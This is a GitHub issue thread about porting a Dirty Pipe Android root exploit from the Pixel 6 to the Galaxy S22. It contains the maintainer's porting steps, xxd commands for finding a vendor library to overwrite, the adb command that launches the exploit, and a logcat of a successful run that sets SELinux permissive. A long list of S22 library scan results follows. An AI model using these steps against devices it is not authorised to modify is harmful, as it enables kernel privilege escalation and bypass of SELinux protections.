search

polygraphene / DirtyPipe-Android

Dirty Pipe root exploit for Android (Pixel 6)
766 stars 129 forks source link

S22 #3

Open oakieville opened 2 years ago

oakieville commented 2 years ago

Could this same method work on s22, i assume it woukd require mymod.ko be built in s22 kernel source but can it work

polygraphene commented 2 years ago

Basically it should work by similar procedure. Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

oakieville commented 2 years ago

Im interesting to try it i have s22 kernel source as well as the firmware to extract libc++ however i would a good deal of guidance in this

oakieville commented 2 years ago

If would could chat on telegram or whats app that would be great

oakieville commented 2 years ago

if possible contact me please oakieville209@gmail.com

oakieville commented 2 years ago

s22 libc++.so

000403e1 w DF .text 00000030 Base std::1::basic_streambuf<char, std::1::char_traits >::basic_streambuf() 000403e1 w DF .text 00000030 Base std::1::basic_streambuf<char, std::1::char_traits >::basic_streambuf()

polygraphene commented 2 years ago

Our schedules might not match for chat.

I added auto detection of offset for libc++.so, so the remaining issues are kernel module and libstagefright_soft_mp3dec.so. kernel module may run other devices without modification. Try it to check if it works.

Target vendor lib (in Pixel 6, libstagefright_soft_mp3dec.so) must have byte 0x57 at offset 0x1000 like following:

$ xxd libstagefright_soft_mp3dec.so|grep 01000:
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__

If you could get firmware image for the device, extract vendor.img on PC and find proper lib with following command:

$ for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
(snip)
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
(snip)

If couldn't find proper lib, we should find other methods.

polygraphene commented 2 years ago

After find lib:

adb shell /data/local/tmp/dirtypipe-android -f (Found lib path)

You can also use /vendor/lib64/*.so, but 32bit lib should have small impact on the system.

If you succeed, adb logcat looks like:

03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
01-01 09:00:00.1023 12649 12649 I stage2  : pipe_size: 65536
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27749): avc: denied { write } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27750): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
01-01 09:00:00.1023 12649 12649 I stage2  : waitid returned with 0. Restore files.
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28232): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28233): avc: denied { getattr } for path="/data/local/tmp/reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=fifo_file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28235): avc: denied { write } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28236): avc: denied { remove_name } for name="reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
elliwigy commented 2 years ago

Not sure if it matters but you can run those commands from shell/on the device itself.. If you run:

xxd libstagefright_soft_mp3dec.so|grep 01000
00001000: 695f 6d65 6d63 7079 3400 5f5f 6165 6162  i_memcpy4.__aeab
00010000: 1400 5ae3 f2fa ffda 1500 5ae3 f7fa ff1a  ..Z.......Z.....

and furthermore the other code returns a long list which I will provide shortly.. are we looking for something that contains this exactly:

00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f _aeabi_memcpy.__

oakieville commented 2 years ago

Hey elliwigy how are you doing, ok i will check as you instructrd above i do see that libstagefright_soft_mp3dec.so on s22 doesnt seem to exist there other libstagefright libs there how i have not yet checked offset i will do so later today or tomorrow.

elliwigy commented 2 years ago

These are all the ones it finds:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/android.automotive.watchdog-V2-ndk_platform.so
vendor/lib/android.frameworks.cameraservice.common@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.0.so
vendor/lib/android.frameworks.cameraservice.service@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.2.so
vendor/lib/android.frameworks.sensorservice@1.0.so
vendor/lib/android.hardware.audio.common-util.so
vendor/lib/android.hardware.audio.common@2.0-util.so
vendor/lib/android.hardware.audio.common@4.0-util.so
vendor/lib/android.hardware.audio.common@4.0.so
vendor/lib/android.hardware.audio.common@5.0-util.so
vendor/lib/android.hardware.audio.common@5.0.so
vendor/lib/android.hardware.audio.common@6.0-util.so
vendor/lib/android.hardware.audio.common@6.0.so
vendor/lib/android.hardware.audio.common@7.0-enums.so
vendor/lib/android.hardware.audio.common@7.0-util.so
vendor/lib/android.hardware.audio.common@7.0.so
vendor/lib/android.hardware.audio.effect@2.0-util.so
vendor/lib/android.hardware.audio.effect@2.0.so
vendor/lib/android.hardware.audio.effect@4.0-util.so
vendor/lib/android.hardware.audio.effect@4.0.so
vendor/lib/android.hardware.audio.effect@5.0-util.so
vendor/lib/android.hardware.audio.effect@5.0.so
vendor/lib/android.hardware.audio.effect@6.0-util.so
vendor/lib/android.hardware.audio.effect@6.0.so
vendor/lib/android.hardware.audio.effect@7.0-util.so
vendor/lib/android.hardware.audio.effect@7.0.so
vendor/lib/android.hardware.audio@2.0-util.so
vendor/lib/android.hardware.audio@2.0.so
vendor/lib/android.hardware.audio@4.0-util.so
vendor/lib/android.hardware.audio@4.0.so
vendor/lib/android.hardware.audio@5.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@5.0.so
vendor/lib/android.hardware.audio@6.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@6.0.so
vendor/lib/android.hardware.audio@7.0-util.so
vendor/lib/android.hardware.audio@7.0.so
vendor/lib/android.hardware.automotive.vehicle@2.0-manager-lib.so
vendor/lib/android.hardware.automotive.vehicle@2.0.so
vendor/lib/android.hardware.biometrics.face@1.0.so
vendor/lib/android.hardware.bluetooth.audio@2.0.so
vendor/lib/android.hardware.bluetooth.audio@2.1.so
vendor/lib/android.hardware.camera.common@1.0.so
vendor/lib/android.hardware.camera.device@1.0.so
vendor/lib/android.hardware.camera.device@3.2.so
vendor/lib/android.hardware.camera.device@3.3.so
vendor/lib/android.hardware.camera.device@3.4.so
vendor/lib/android.hardware.camera.device@3.5.so
vendor/lib/android.hardware.camera.device@3.6.so
vendor/lib/android.hardware.camera.device@3.7.so
vendor/lib/android.hardware.camera.metadata@3.2.so
vendor/lib/android.hardware.camera.metadata@3.3.so
vendor/lib/android.hardware.camera.metadata@3.4.so
vendor/lib/android.hardware.camera.metadata@3.5.so
vendor/lib/android.hardware.camera.metadata@3.6.so
vendor/lib/android.hardware.camera.provider@2.4-legacy.so
vendor/lib/android.hardware.camera.provider@2.4.so
vendor/lib/android.hardware.camera.provider@2.5-legacy.so
vendor/lib/android.hardware.camera.provider@2.5.so
vendor/lib/android.hardware.camera.provider@2.6.so
vendor/lib/android.hardware.cas.native@1.0.so
vendor/lib/android.hardware.cas@1.0.so
vendor/lib/android.hardware.cas@1.1.so
vendor/lib/android.hardware.cas@1.2.so
vendor/lib/android.hardware.gatekeeper@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.1.so
vendor/lib/android.hardware.gnss.visibility_control@1.0.so
vendor/lib/android.hardware.gnss@1.0.so
vendor/lib/android.hardware.gnss@1.1.so
vendor/lib/android.hardware.gnss@2.0.so
vendor/lib/android.hardware.gnss@2.1.so
vendor/lib/android.hardware.graphics.composer@2.1.so
vendor/lib/android.hardware.graphics.composer@2.2.so
vendor/lib/android.hardware.graphics.composer@2.3.so
vendor/lib/android.hardware.health@1.0.so
vendor/lib/android.hardware.health@2.0.so
vendor/lib/android.hardware.health@2.1.so
vendor/lib/android.hardware.media.c2@1.0.so
vendor/lib/android.hardware.media.c2@1.1.so
vendor/lib/android.hardware.power@1.0.so
vendor/lib/android.hardware.power@1.1.so
vendor/lib/android.hardware.power@1.2.so
vendor/lib/android.hardware.sensors@1.0.so
vendor/lib/android.hardware.sensors@2.0-ScopedWakelock.so
vendor/lib/android.hardware.sensors@2.0.so
vendor/lib/android.hardware.sensors@2.1.so
vendor/lib/android.hardware.soundtrigger@2.1.so
vendor/lib/android.hardware.soundtrigger@2.2.so
vendor/lib/android.hardware.soundtrigger@2.3.so
vendor/lib/android.hardware.thermal@1.0.so
vendor/lib/android.hardware.thermal@2.0.so
vendor/lib/android.hidl.allocator@1.0.so
vendor/lib/android.hidl.memory.block@1.0.so
vendor/lib/android.system.net.netd@1.0.so
vendor/lib/android.system.net.netd@1.1.so
vendor/lib/audio_common-aidl-cpp.so
vendor/lib/audioclient-types-aidl-cpp.so
vendor/lib/btaudio_offload_if.so
vendor/lib/camera.device@1.0-impl.so
vendor/lib/camera.device@3.2-impl.so
vendor/lib/camera.device@3.3-impl.so
vendor/lib/camera.device@3.4-impl.so
vendor/lib/camera.device@3.5-impl.so
vendor/lib/camx.device@3.2-impl.so
vendor/lib/camx.device@3.3-impl.so
vendor/lib/camx.device@3.4-ext-impl.so
vendor/lib/camx.device@3.4-impl.so
vendor/lib/camx.device@3.5-ext-impl.so
vendor/lib/camx.device@3.5-impl.so
vendor/lib/camx.device@3.6-ext-impl.so
vendor/lib/camx.device@3.6-impl.so
vendor/lib/camx.provider@2.4-external.so
vendor/lib/camx.provider@2.4-impl.so
vendor/lib/camx.provider@2.4-legacy.so
vendor/lib/camx.provider@2.5-external.so
vendor/lib/camx.provider@2.5-legacy.so
vendor/lib/camx.provider@2.6-legacy.so
vendor/lib/cdsp_face.so
vendor/lib/cdsp_face_4.2.so
vendor/lib/com.qti.chiusecaseselector.so
vendor/lib/com.qti.feature2.anchorsync.so
vendor/lib/com.qti.feature2.demux.so
vendor/lib/com.qti.feature2.derivedoffline.so
vendor/lib/com.qti.feature2.frameselect.so
vendor/lib/com.qti.feature2.fusion.so
vendor/lib/com.qti.feature2.generic.so
vendor/lib/com.qti.feature2.gs.cedros.so
vendor/lib/com.qti.feature2.gs.fillmore.so
vendor/lib/com.qti.feature2.gs.sdm865.so
vendor/lib/com.qti.feature2.gs.sm8350.so
vendor/lib/com.qti.feature2.gs.sm8450.so
vendor/lib/com.qti.feature2.hdr.so
vendor/lib/com.qti.feature2.mcreprocrt.so
vendor/lib/com.qti.feature2.memcpy.so
vendor/lib/com.qti.feature2.mfsr.sm8450.so
vendor/lib/com.qti.feature2.mfsr.so
vendor/lib/com.qti.feature2.ml.so
vendor/lib/com.qti.feature2.mux.so
vendor/lib/com.qti.feature2.qcfa.so
vendor/lib/com.qti.feature2.rawhdr.so
vendor/lib/com.qti.feature2.realtimeserializer.so
vendor/lib/com.qti.feature2.rt.so
vendor/lib/com.qti.feature2.rtmcx.so
vendor/lib/com.qti.feature2.serializer.so
vendor/lib/com.qti.feature2.statsregeneration.so
vendor/lib/com.qti.feature2.stub.so
vendor/lib/com.qti.feature2.swmf.so
vendor/lib/com.qti.qseeaon.so
vendor/lib/com.qti.qseeutils.so
vendor/lib/com.qti.settings.fillmore.so
vendor/lib/com.qti.settings.sm8450.so
vendor/lib/com.qti.stats.common.so
vendor/lib/com.qualcomm.mcx.distortionmapper.so
vendor/lib/com.qualcomm.mcx.linearmapper.so
vendor/lib/com.qualcomm.mcx.policy.mfl.so
vendor/lib/com.qualcomm.mcx.policy.xr.so
vendor/lib/com.qualcomm.qti.imscmservice@1.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.1.so
vendor/lib/com.qualcomm.qti.imscmservice@2.2.so
vendor/lib/com.qualcomm.qti.mcx.usecase.extension.so
vendor/lib/com.qualcomm.qti.uceservice@2.0.so
vendor/lib/com.qualcomm.qti.uceservice@2.1.so
vendor/lib/com.qualcomm.qti.uceservice@2.2.so
vendor/lib/com.qualcomm.qti.uceservice@2.3.so
vendor/lib/framework-permission-aidl-cpp.so
vendor/lib/libAFSegmenter_v1.camera.samsung.so
vendor/lib/libAImode_wrapper.camera.samsung.so
vendor/lib/libAIphoto_core.camera.samsung.so
vendor/lib/libAlacSwDec.so
vendor/lib/libApeSwDec.so
vendor/lib/libBeauty_v4.camera.samsung.so
vendor/lib/libBlurDetectionDeepLearning.camera.samsung.so
vendor/lib/libCB.so
vendor/lib/libDepthBokehVideo_interface.so
vendor/lib/libDeviceInfoProvider.so
vendor/lib/libEGL_adreno.so
vendor/lib/libEventFinder.camera.samsung.so
vendor/lib/libEvrcSwCodec.so
vendor/lib/libFacePreProcessing.camera.samsung.so
vendor/lib/libFaceService.so
vendor/lib/libFace_Landmark_API.camera.samsung.so
vendor/lib/libFastUWDistortionCorrection.camera.samsung.so
vendor/lib/libFlacSwDec.so
vendor/lib/libFrucSSMLib.so
vendor/lib/libGLESv2_adreno.so
vendor/lib/libGPQTEEC_vendor.so
vendor/lib/libGPTEE_vendor.so
vendor/lib/libGPreqcancel.so
vendor/lib/libGPreqcancel_svc.so
vendor/lib/libHDRVerifier_v1.camera.samsung.so
vendor/lib/libHandGesture.camera.samsung.so
vendor/lib/libHprFace_GAE_api.camera.samsung.so
vendor/lib/libHprVisualEffect.so
vendor/lib/libHpr_RecGAE_cvFeature_v1.0.camera.samsung.so
vendor/lib/libHumanSegVideoModel_Vendor.so
vendor/lib/libIDDQD_core.so
vendor/lib/libIMUSensor.so
vendor/lib/libLocalTM_capture_core.camera.samsung.so
vendor/lib/libLocalTM_preview_core.so
vendor/lib/libLocalTM_wrapper.camera.samsung.so
vendor/lib/libMoireDetection.camera.samsung.so
vendor/lib/libMoireDetectionWrapper.camera.samsung.so
vendor/lib/libMoireDetector.uniplugin@1.0.so
vendor/lib/libMoonVerifier_v1.camera.samsung.so
vendor/lib/libObjectDetector_v1.camera.samsung.so
vendor/lib/libOmxCore.so
vendor/lib/libOpenCL.so
vendor/lib/libOpenCv.camera.samsung.so
vendor/lib/libPanDetector.so
vendor/lib/libPersonal_capture.camera.samsung.so
vendor/lib/libPersonal_core.camera.samsung.so
vendor/lib/libPetDetector_interface.so
vendor/lib/libPlaneSegmentationWrapper.so
vendor/lib/libQSEEComAPI.so
vendor/lib/libQTEEConnector_listener.so
vendor/lib/libQTEEConnector_vendor.so
vendor/lib/libQcelp13SwCodec.so
vendor/lib/libRelighting_API.camera.samsung.so
vendor/lib/libSSMAutoTrigger_interface.so
vendor/lib/libSSM_AutoTrigger.so
vendor/lib/libSceneDetector_v1.camera.samsung.so
vendor/lib/libSingleTakeBlurDetection.uniplugin@1.0.so
vendor/lib/libTouchInputVM.so
vendor/lib/libTrustedInput.so
vendor/lib/libTrustedInputTZ.so
vendor/lib/libTrustedUI.so
vendor/lib/libTrustedUITZ.so
vendor/lib/libTrustedUIVM.so
vendor/lib/libVideoSuperNight_interface.so
vendor/lib/lib_SamsungRec_08020.so
vendor/lib/lib_SoundAlive_3DPosition_ver202.so
vendor/lib/lib_SoundAlive_AlbumArt_ver105.so
vendor/lib/lib_SoundAlive_play_plus_ver500.so
vendor/lib/lib_SoundBooster_ver1100.so
vendor/lib/lib_bt_aptx.so
vendor/lib/lib_bt_ble.so
vendor/lib/lib_bt_bundle.so
vendor/lib/lib_lvacfs.so
vendor/lib/libadm.so
vendor/lib/libadreno_app_profiles.so
vendor/lib/libadreno_utils.so
vendor/lib/libadsp_default_listener.so
vendor/lib/libadsprpc.so
vendor/lib/libagm.so
vendor/lib/libagm_compress_plugin.so
vendor/lib/libagm_mixer_plugin.so
vendor/lib/libagm_pcm_plugin.so
vendor/lib/libagmclient.so
vendor/lib/libagmmixer.so
vendor/lib/libaidenoiser.so
vendor/lib/libaivideocentral.arcsoft.so
vendor/lib/libalsautils.so
vendor/lib/libapex_cmn.so
vendor/lib/libapex_utils.so
vendor/lib/libar-acdb.so
vendor/lib/libar-gpr.so
vendor/lib/libar-gsl.so
vendor/lib/libar-pal.so
vendor/lib/libarcsoft_aieffectpk_video.so
vendor/lib/libarcsoft_aieffectpk_video_bokeh.so
vendor/lib/libarcsoft_aieffectpk_video_plight.so
vendor/lib/libarcsoft_dualcam_portraitlighting_preview.so
vendor/lib/libarcsoft_object_tracking.so
vendor/lib/libarcsoft_video_super_night.so
00001000: 5f63 6f6e 645f 6272 6f61 6463 6173 7400  _cond_broadcast.
vendor/lib/libats.so
vendor/lib/libaudio_log_utils.so
vendor/lib/libaudioclient_aidl_conversion.so
vendor/lib/libaudiofoundation.so
vendor/lib/libauto_framing_arcsoft.uniplugin@1.0.so
vendor/lib/libautotracking_interface.so
vendor/lib/libavservices_minijail.so
vendor/lib/libbase64.so
vendor/lib/libbatching.so
vendor/lib/libbatterylistener.so
vendor/lib/libbauthserver.so
vendor/lib/libbauthtzcommon.so
vendor/lib/libbeautyshot.arcsoft.so
vendor/lib/libbitmlengine.so
vendor/lib/libbitmlenginev2.so
vendor/lib/libbluetooth_a2dpsink_session.so
vendor/lib/libbluetooth_audio_session.so
vendor/lib/libbluetooth_audio_session_qti.so
vendor/lib/libbluetooth_audio_session_qti_2_1.so
vendor/lib/libbodyid.arcsoft.so
vendor/lib/libbthost_if.so
vendor/lib/libcacertclient.so
vendor/lib/libcamera2ndk_vendor.so
vendor/lib/libcamera_nn_stub.so
vendor/lib/libcamerapostproc.so
vendor/lib/libcamxcommonutils.so
vendor/lib/libcamxexternalformatutils.so
vendor/lib/libcamxfacialfeatures.so
vendor/lib/libcamxfdalgo.so
vendor/lib/libcamxfdengine.so
vendor/lib/libcamxhwnodecontext.so
vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libcamximageformatutils.so
vendor/lib/libcamxqsatalgo.so
vendor/lib/libcamxsettingsmanager.so
vendor/lib/libcamxstatscore.so
vendor/lib/libcamxswispiqmodule.so
vendor/lib/libcamxswprocessalgo.so
vendor/lib/libcamxtintlessalgo.so
vendor/lib/libcapiv2svacnnvendor.so
vendor/lib/libcapiv2svarnnvendor.so
vendor/lib/libcapiv2uvvendor.so
vendor/lib/libcdfw.so
vendor/lib/libcdfw_remote_api.so
vendor/lib/libcdsp_default_listener.so
vendor/lib/libcdsprpc.so
vendor/lib/libchilog.so
vendor/lib/libchrome.so
vendor/lib/libcne.so
vendor/lib/libcneapiclient.so
vendor/lib/libcneoplookup.so
vendor/lib/libcneqmiutils.so
vendor/lib/libcodec2_hidl@1.0.so
vendor/lib/libcodec2_hidl@1.1.so
vendor/lib/libcodec2_hidl_plugin.so
vendor/lib/libcodec2_simple_component.so
vendor/lib/libcodec2_soft_common.so
vendor/lib/libcodec2_vndk.so
vendor/lib/libcodecsolutionhelper_vendor.so
vendor/lib/libcolor-default.so
vendor/lib/libcom.qti.chinodeutils.so
vendor/lib/libconfigdb.so
vendor/lib/libcpion.so
vendor/lib/libcv_common.so
vendor/lib/libdataitems.so
vendor/lib/libdepth_bokeh_video.uniplugin@1.0.so
vendor/lib/libdiag.so
vendor/lib/libdiagjni.so
vendor/lib/libdigital-dimming.so
vendor/lib/libdisp-aba.so
vendor/lib/libdisplayconfig.qti.so
vendor/lib/libdisplaydebug.so
vendor/lib/libdisplayqos.so
vendor/lib/libdisplayskuutils.so
vendor/lib/libdpps.so
vendor/lib/libdrm.so
vendor/lib/libdrmfs.so
00001000: 5f63 6669 5f63 6865 636b 5f66 6169 6c5f  _cfi_check_fail_
vendor/lib/libdrmtime.so
vendor/lib/libdrmutils.so
vendor/lib/libdsd2pcm.so
vendor/lib/libdsi_netctrl.so
vendor/lib/libdsphist_qc.so
vendor/lib/libdspmc_qc.so
vendor/lib/libdspmc_wrapper.so
vendor/lib/libdsutils.so
vendor/lib/libdualcam_refocus_image.so
vendor/lib/libdualcam_refocus_video.so
vendor/lib/libeffects.so
vendor/lib/libeffectsconfig.so
vendor/lib/libegis_fp_normal_sensor_test.so
vendor/lib/libengine_did.so
vendor/lib/libesesbprovision.so
vendor/lib/libeva.so
vendor/lib/libeva_util.so
vendor/lib/libevent_finder.uniplugin@1.0.so
vendor/lib/libexifa.camera.samsung.so
vendor/lib/libface_landmark.arcsoft.so
vendor/lib/libfast_uwdc.uniplugin@1.0.so
vendor/lib/libfastcvdsp_stub.so
vendor/lib/libfastcvopt.so
vendor/lib/libfidoauthnr_v2.so
vendor/lib/libfilefinder.so
vendor/lib/libfloatingfeature.so
vendor/lib/libfmpal.so
00001000: 5f31 325f 5f76 616c 7565 5f74 7970 6549  _12__value_typeI
vendor/lib/libfocuspeaking.so
vendor/lib/libfocuspeaking.uniplugin@1.0.so
vendor/lib/libformatConverter.unifunc.so
vendor/lib/libgame_enhance.so
vendor/lib/libgaya.so
vendor/lib/libgeofencing.so
vendor/lib/libgf_in_system_lib.so
vendor/lib/libgnss.so
vendor/lib/libgnsspps.so
vendor/lib/libgps.utils.so
vendor/lib/libgpu_tonemapper.so
00001000: 5f00 5f5a 3230 656e 6769 6e65 5f64 656c  _._Z20engine_del
vendor/lib/libgpudataproducer.so
vendor/lib/libgralloc.qti.so
vendor/lib/libgralloc_helper.unifunc.so
vendor/lib/libgralloccore.so
vendor/lib/libgrallocusage.so
vendor/lib/libgrallocutils.so
vendor/lib/libgsl.so
vendor/lib/libhand_interaction.uniplugin@1.0.so
vendor/lib/libhandgesture.arcsoft.so
vendor/lib/libhdcp1prov.so
vendor/lib/libhdcp2p2prov.so
vendor/lib/libhdcpsrm.so
vendor/lib/libhdr10plus.so
vendor/lib/libhdr_backlight_adapter.so
vendor/lib/libhdr_tm.so
vendor/lib/libhdradaptivecustom.so
vendor/lib/libhdrdynamic.so
vendor/lib/libhdrdynamicootf.so
vendor/lib/libhermes.so
00001000: 5f39 616c 6c6f 6361 746f 7249 5335 5f45  _9allocatorIS5_E
vendor/lib/libhidltransport.so
vendor/lib/libhqm_hwparam.so
vendor/lib/libhwbinder.so
vendor/lib/libhypermotion_core.so
vendor/lib/libhypermotion_interface.so
vendor/lib/libhypervintf.so
vendor/lib/libiddqd.uniplugin@1.0.so
vendor/lib/libidl.so
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p
vendor/lib/libimagecodec_native.quram.so
vendor/lib/libipebpsstriping.so
vendor/lib/libipebpsstriping170.so
vendor/lib/libipebpsstriping480.so
vendor/lib/libizat_client_api.so
vendor/lib/libizat_core.so
vendor/lib/libjnihelper.so
vendor/lib/libjpege.so
vendor/lib/libjpegencoder_sw.unifunc.so
vendor/lib/libjpegsq.media.samsung.so
vendor/lib/libjpegsqueezer_sw.unifunc.so
vendor/lib/libjson.so
vendor/lib/libkcl.so
vendor/lib/libkernelmanager.so
vendor/lib/liblbs_core.so
vendor/lib/liblistensoundmodel2vendor.so
vendor/lib/liblivefocus_capture_engine.so
vendor/lib/liblivefocus_capture_interface.so
vendor/lib/liblivefocus_preview_engine.so
vendor/lib/liblivefocus_preview_interface.so
vendor/lib/libllvm-glnext.so
vendor/lib/libllvm-qcom.so
vendor/lib/libllvm-qgl.so
vendor/lib/libloc_api_v02.so
vendor/lib/libloc_api_wds.so
vendor/lib/libloc_core.so
vendor/lib/libloc_socket.so
vendor/lib/libloc_util.so
vendor/lib/liblocation_api.so
vendor/lib/liblocationservice.so
vendor/lib/liblocationservice_glue.so
vendor/lib/liblowi_client.so
vendor/lib/liblx-ar_util.so
vendor/lib/liblx-osal.so
vendor/lib/libmaskdetection.uniplugin@1.0.so
vendor/lib/libmcs.so
vendor/lib/libmctfengine_stub.so
vendor/lib/libmdmdetect.so
vendor/lib/libmdsprpc.so
vendor/lib/libmfGhostDetection.so
vendor/lib/libminkdescriptor.so
vendor/lib/libminksocket_vendor.so
vendor/lib/libmm-hdcpmgr.so
vendor/lib/libmm-omxcore.so
vendor/lib/libmmcamera_bestats.so
00001000: 5f75 0043 636c 616d 7036 345f 7300 4363  _u.Cclamp64_s.Cc
vendor/lib/libmmcamera_cac3.so
vendor/lib/libmmcamera_lscv35.so
vendor/lib/libmmcamera_mfnr.so
vendor/lib/libmmcamera_mfnr_t4.so
vendor/lib/libmmcamera_pdpc.so
vendor/lib/libmpbase.so
vendor/lib/libmulticam_image_optical_zoom.so
vendor/lib/libmulticam_optical_zoom_control.so
vendor/lib/libmulticam_video_optical_zoom.so
vendor/lib/libmultiobject_tracker.so
vendor/lib/libnative-api.so
vendor/lib/libnbaio_mono.so
vendor/lib/libnetmgr.so
vendor/lib/libnetmgr_common.so
vendor/lib/libnetmgr_utils.so
vendor/lib/libnetmgrxfrmutils.so
vendor/lib/liboemaids_vendor.so
vendor/lib/liboemcrypto.so
vendor/lib/libopencv.so
vendor/lib/libopencv3a.so
vendor/lib/libopenvx.so
vendor/lib/libopestriping.so
00001000: 5f6d 696e 696d 616c 005f 5f75 6273 616e  _minimal.__ubsan
vendor/lib/libops.so
vendor/lib/libopus.so
vendor/lib/libos.so
vendor/lib/libpa.so
vendor/lib/libpadm.so
vendor/lib/libpalclient.so
vendor/lib/libpantilt_detector.uniplugin@1.0.so
vendor/lib/libpassese.so
vendor/lib/libpdmapper.so
vendor/lib/libpdnotifier.so
vendor/lib/libperfconfig.so
00001000: 5f5a 4e31 3950 6572 6643 6f6e 6669 6744  _ZN19PerfConfigD
vendor/lib/libperfgluelayer.so
vendor/lib/libperfioctl.so
vendor/lib/libperipheral_client.so
vendor/lib/libpersonalimprinting.uniplugin@1.0.so
vendor/lib/libpet_detector.uniplugin@1.0.so
vendor/lib/libplatformconfig.so
vendor/lib/libpredeflicker_native.so
vendor/lib/libprofileparamstorage.so
vendor/lib/libprotobuf-cpp-full-3.9.1.so
vendor/lib/libprotobuf-cpp-lite-3.9.1.so
vendor/lib/libpsi.so
vendor/lib/libq3dtools_adreno.so
vendor/lib/libqc2audio_base.so
vendor/lib/libqc2audio_basecodec.so
vendor/lib/libqc2audio_core.so
vendor/lib/libqc2audio_hooks.so
vendor/lib/libqc2audio_hwaudiocodec.so
vendor/lib/libqc2audio_platform.so
vendor/lib/libqc2audio_swaudiocodec.so
vendor/lib/libqc2audio_utils.so
vendor/lib/libqc2colorconvertfilter.so
vendor/lib/libqc2filter.so
vendor/lib/libqc2imageformatfilter.so
vendor/lib/libqcbor.so
vendor/lib/libqcc_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqcci_legacy.so
vendor/lib/libqcmaputils.so
vendor/lib/libqcodec2_base.so
vendor/lib/libqcodec2_basecodec.so
vendor/lib/libqcodec2_core.so
vendor/lib/libqcodec2_filterbase.so
vendor/lib/libqcodec2_hooks.so
vendor/lib/libqcodec2_mockfilter.so
vendor/lib/libqcodec2_mockqc2filter.so
vendor/lib/libqcodec2_platform.so
vendor/lib/libqcodec2_utils.so
vendor/lib/libqcodec2_v4l2codec.so
vendor/lib/libqdMetaData.so
vendor/lib/libqdcm-algo.so
00001000: 5f5f 7661 6c75 655f 7479 7065 494e 3471  __value_typeIN4q
